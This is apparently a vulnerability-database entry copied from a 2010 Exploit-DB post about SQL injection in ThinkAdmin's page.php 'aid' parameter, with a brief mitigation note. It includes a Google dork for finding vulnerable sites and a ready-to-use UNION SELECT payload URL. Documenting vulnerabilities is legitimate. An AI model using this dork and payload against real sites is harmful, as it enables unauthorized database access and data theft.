ThinkAdmin Sql Injection Vulnerability

vendor:

ThinkAdmin

by:

AtT4CKxT3rR0r1ST

7,5

CVSS

HIGH

Sql Injection

CWE

Product Name: ThinkAdmin

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: a:thinkadmin:thinkadmin

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

ThinkAdmin Sql Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable page.php file. The vulnerable parameter is ‘aid’ which can be manipulated to inject malicious SQL queries. For example, an attacker can send the following request to the vulnerable page.php file: http://server/page.php?id=21&aid=-12'union+select+1,version(),3,4,5,6,7,8-- -&s=3

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

==========================================================
###########################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Email : F.Hack@w.cn
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : ThinkAdmin
.:. Script Download: http://www.thinkadmin.net/
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : Powered by ThinkAdmin
.:. Date : 30/1/2010

#############################################

===[ Exploit ]===

www.site.com/page.php?id=21&aid=12[SQL INJECTION]&s=3

www.site.com/page.php?id=21&aid=-12'+union+select+1,version(),3,4,5,6,7,8-- -&s=3

===[ Example ]===

http://server/page.php?id=21&aid=-12'union+select+1,version(),3,4,5,6,7,8-- -&s=3

#############################################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack